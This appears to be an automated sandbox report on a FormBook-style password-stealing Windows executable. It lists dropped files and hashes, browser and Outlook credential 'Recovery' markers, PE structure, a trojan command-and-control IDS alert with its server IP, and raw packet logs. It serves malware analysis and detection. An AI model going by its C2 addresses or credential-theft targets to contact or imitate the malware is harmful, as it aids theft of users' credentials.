                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                      Category:dropped
                                                      Size (bytes):85068
                                                      Entropy (8bit):7.897722259557356
                                                      Encrypted:false
                                                      SSDEEP:1536:CwFfc1h3BPcUQKIQiBMEcbX1dY+5yUpknIDHs5Nd:r1c1cJKIJBMzX80y89M9
                                                      MD5:6530D644CE203153C2F8021CDE6757AA
                                                      SHA1:9DEE4DE92BD88C0B85B9CC63D92B73770A04212E
                                                      SHA-256:6AA1AE20BA133ADFC37B6DA1206DE245F10B95E1A0F191B048FE4BAC37395351
                                                      SHA-512:855721F91AD1EC173E80421BB3651C2259E21C79FBED7CAAD89EEAADF9E4ED10F406D8C3948A4EF0AF786A20915B5BFDE7F502506B3FF1FE427324BD409041A6
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):812
                                                      Entropy (8bit):3.551644151882457
                                                      Encrypted:false
                                                      SSDEEP:24:YUd8aU5okH+gUca7b50d8a45lUd7gScpD7b5G:bdSCy3hdGFW
                                                      MD5:BDA0AFD5A9D0085F5D23856A8DABF41F
                                                      SHA1:845923C84C0A3B03C0681BDC9AD40BD372FFF941
                                                      SHA-256:8701239D15BA2C711165C65E6E07A06EF2C0963EDC6E7CD651F27F61AD81D0F2
                                                      SHA-512:04E3DF3119E9EEEFFD0D7F4D50A5802B5A20E6F5A00B386C2FACB207867CC9B0CA8116E1346786B8CB6BBF62C24E6F552D340B4C89E5110BAA30CE082C67913D
                                                      Malicious:false
                                                      Preview:....O.u.t.l.o.o.k. .R.e.c.o.v.e.r.y.....c.l.s.i.d...{.E.D.4.7.5.4.1.4.-.B.0.D.6.-.1.1.D.2.-.8.C.3.B.-.0.0.1.0.4.B.2.A.6.6.7.6.}. .....M.i.n.i. .U.I.D...3.5.5.7.6.7.0.6.2.0.....S.e.r.v.i.c.e. .U.I.D... . . . . . . . .....S.e.r.v.i.c.e. .N.a.m.e...C.O.N.T.A.B. .....M.A.P.I. .P.r.o.v.i.d.e.r...2.....A.c.c.o.u.n.t. .N.a.m.e...O.u.t.l.o.o.k. .A.d.d.r.e.s.s. .B.o.o.k. .....P.r.e.f.e.r.e.n.c.e.s. .U.I.D... . . . . . . . .........c.l.s.i.d...{.E.D.4.7.5.4.1.4.-.B.0.D.6.-.1.1.D.2.-.8.C.3.B.-.0.0.1.0.4.B.2.A.6.6.7.6.}. .....M.i.n.i. .U.I.D...2.1.4.4.9.7.4.3.6.2.....S.e.r.v.i.c.e. .U.I.D... . . . . . . . .....S.e.r.v.i.c.e. .N.a.m.e...M.S.U.P.S.T. .M.S. .....M.A.P.I. .P.r.o.v.i.d.e.r...4.....A.c.c.o.u.n.t. .N.a.m.e...O.u.t.l.o.o.k. .D.a.t.a. .F.i.l.e. .....P.r.e.f.e.r.e.n.c.e.s. .U.I.D... . . . . . . . .........
                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                      File Type:Targa image data - RGB - RLE 109 x 101 x 32 +114 +111 "R"
                                                      Category:dropped
                                                      Size (bytes):38
                                                      Entropy (8bit):2.7883088224543333
                                                      Encrypted:false
                                                      SSDEEP:3:rFGQJhIl:RGQPY
                                                      MD5:4AADF49FED30E4C9B3FE4A3DD6445EBE
                                                      SHA1:1E332822167C6F351B99615EADA2C30A538FF037
                                                      SHA-256:75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
                                                      SHA-512:EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
                                                      Malicious:false
                                                      Preview:....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....
                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):40
                                                      Entropy (8bit):2.8420918598895937
                                                      Encrypted:false
                                                      SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                                      MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                                      SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                                      SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                                      SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                                      Malicious:true
                                                      Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....
                                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):40
                                                      Entropy (8bit):2.96096404744368
                                                      Encrypted:false
                                                      SSDEEP:3:AJlbeGQJhIl:tGQPY
                                                      MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
                                                      SHA1:24CB89501F0212FF3095ECC0ABA97DD563718FB1
                                                      SHA-256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
                                                      SHA-512:ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
                                                      Malicious:true
                                                      Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):714752
                                                      Entropy (8bit):7.447804085883893
                                                      Encrypted:false
                                                      SSDEEP:12288:pS6ln+flo/XciMvHqpJr5OM2roh+AvKOdSHYYb+4YTePd0iTffYqHey2YQPdOl7N:wTdCjEHor5h8SnkYYq5Ud0kffL2lk74i
                                                      MD5:D72C3BB3172D13AC1CFC172C389E52E5
                                                      SHA1:A0BF2DC6BA08E4702098576B8E91F08C91A201CA
                                                      SHA-256:2B7C90F224A3F2964F56820652AE35673CB830D152DC2203EC1629F69B8F5A00
                                                      SHA-512:2B78732BB0BEB0306521E5D38B6EA9C575FB62E263AA2973D57DD33D62B413B8FBAA058A03A3D78C0204D8BDC4398F5B04728E1B1F6E5DC548D995C189D20875
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 24%
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.447804085883893
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      File size:714'752 bytes
                                                      MD5:d72c3bb3172d13ac1cfc172c389e52e5
                                                      SHA1:a0bf2dc6ba08e4702098576b8e91f08c91a201ca
                                                      SHA256:2b7c90f224a3f2964f56820652ae35673cb830d152dc2203ec1629f69b8f5a00
                                                      SHA512:2b78732bb0beb0306521e5d38b6ea9c575fb62e263aa2973d57dd33d62b413b8fbaa058a03a3d78c0204d8bdc4398f5b04728e1b1f6e5dc548d995c189d20875
                                                      SSDEEP:12288:pS6ln+flo/XciMvHqpJr5OM2roh+AvKOdSHYYb+4YTePd0iTffYqHey2YQPdOl7N:wTdCjEHor5h8SnkYYq5Ud0kffL2lk74i
                                                      TLSH:97E402815F525076C206BF398744B7B4C11F9DD6742BAB0BAE93F257A8FB6C27A03058
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d..............0.............n.... ........@.. .......................@............@................................
                                                      Icon Hash:98306e8c8cb6828c
                                                      Entrypoint:0x49f26e
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x64B8D5D6 [Thu Jul 20 06:36:06 2023 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x9f219          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa0000          0x10e70       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb2000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x9dc60          0x54          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity       File Type  Entropy              Characteristics
.text   0x2000           0x9d274       0x9d400   False     0.9419574100755167    data       7.772224469495988    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xa0000          0x10e70       0x11000   False     0.055161420036764705  data       1.505780016282093    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xb2000          0xc           0x200     False     0.044921875           data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size     Type                                                                               Language  Country  ZLIB Complexity
RT_ICON        0xa0130  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 67584                                   0.045353720572577784
RT_GROUP_ICON  0xb0958  0x14     data                                                                                                  1.0
RT_VERSION     0xb096c  0x318    data                                                                                                  0.44191919191919193
RT_MANIFEST    0xb0c84  0x1ea    XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP    Dest IP
07/20/23-11:46:57.367343  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49731        80         192.168.2.5  23.227.38.74
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                      Jul 20, 2023 11:45:13.389787912 CEST4971880192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.392288923 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.404472113 CEST8049718152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.404510975 CEST8049718152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.406831980 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.406996965 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.409661055 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.424377918 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424401045 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424513102 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424529076 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424536943 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424566031 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.424631119 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.424650908 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424755096 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424822092 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424835920 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.424835920 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.424835920 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.424896955 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.424896955 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.437289000 CEST8049718152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.437321901 CEST8049718152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.437460899 CEST4971880192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.437509060 CEST4971880192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.439776897 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.439800978 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.439903021 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.439917088 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.439922094 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.439943075 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.439960003 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.439965963 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.439977884 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.439996958 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.440005064 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.440033913 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.440062046 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.440140009 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.440197945 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.454664946 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.454803944 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.454813004 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.454813957 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.454814911 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.454817057 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.454838037 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.454854012 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.454875946 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.454909086 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.454930067 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.454940081 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.454971075 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455004930 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455037117 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455148935 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455163002 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.455200911 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455248117 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455265999 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.455291033 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.455298901 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455331087 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.455358982 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455377102 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.455400944 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455442905 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455450058 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.455450058 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.455488920 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455530882 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455574989 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455621004 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455653906 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455686092 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455718040 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455782890 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455826998 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455869913 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.455916882 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.470532894 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.470561028 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.470632076 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.470658064 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.470793962 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.470839977 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.470892906 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.470972061 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471034050 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471112013 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471177101 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471200943 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471277952 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471373081 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471512079 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471549988 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471643925 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471697092 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471844912 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471870899 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471899986 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.471995115 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472019911 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472115040 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472225904 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472238064 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472346067 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472371101 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472469091 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472589016 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472628117 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472656012 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472701073 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472760916 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472825050 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.472907066 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.473016977 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.473045111 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.473145962 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.473272085 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.473376036 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.489413977 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.489476919 CEST8049719152.199.21.175192.168.2.5
                                                      Jul 20, 2023 11:45:13.490278006 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:13.490278006 CEST4971980192.168.2.5152.199.21.175
                                                      Jul 20, 2023 11:45:33.893501997 CEST4972080192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:33.908224106 CEST804972034.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:33.908490896 CEST4972080192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:33.908654928 CEST4972080192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:33.923119068 CEST804972034.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:34.316102028 CEST804972034.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:34.316149950 CEST804972034.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:34.316497087 CEST4972080192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:34.316550970 CEST4972080192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:34.339818001 CEST804972034.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.329653025 CEST4972180192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.344649076 CEST804972134.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.344885111 CEST4972180192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.345082998 CEST4972180192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.345113993 CEST4972180192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.346472979 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.359899044 CEST804972134.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.359941006 CEST804972134.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.361291885 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.364636898 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.367321968 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.373075008 CEST804972134.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.382277966 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.382309914 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.382328033 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.382347107 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.382365942 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.382383108 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.382400036 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.382474899 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.382544041 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.390975952 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.391014099 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.391192913 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.405883074 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.405910015 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.405929089 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.405946016 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.405961990 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.405977964 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.405994892 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.406011105 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.406028032 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.406044960 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.406064034 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.406075954 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.406080961 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.406075954 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.406096935 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.406114101 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.406131983 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.406168938 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.406203032 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.414599895 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.414633989 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.414650917 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.414668083 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.414684057 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.414700985 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.414805889 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.414805889 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.414870024 CEST4972280192.168.2.534.102.136.180
                                                      Jul 20, 2023 11:45:36.429465055 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429501057 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429524899 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429544926 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429563999 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429583073 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429605007 CEST804972234.102.136.180192.168.2.5
                                                      Jul 20, 2023 11:45:36.429625034 CEST804972234.102.136.180192.168.2.5
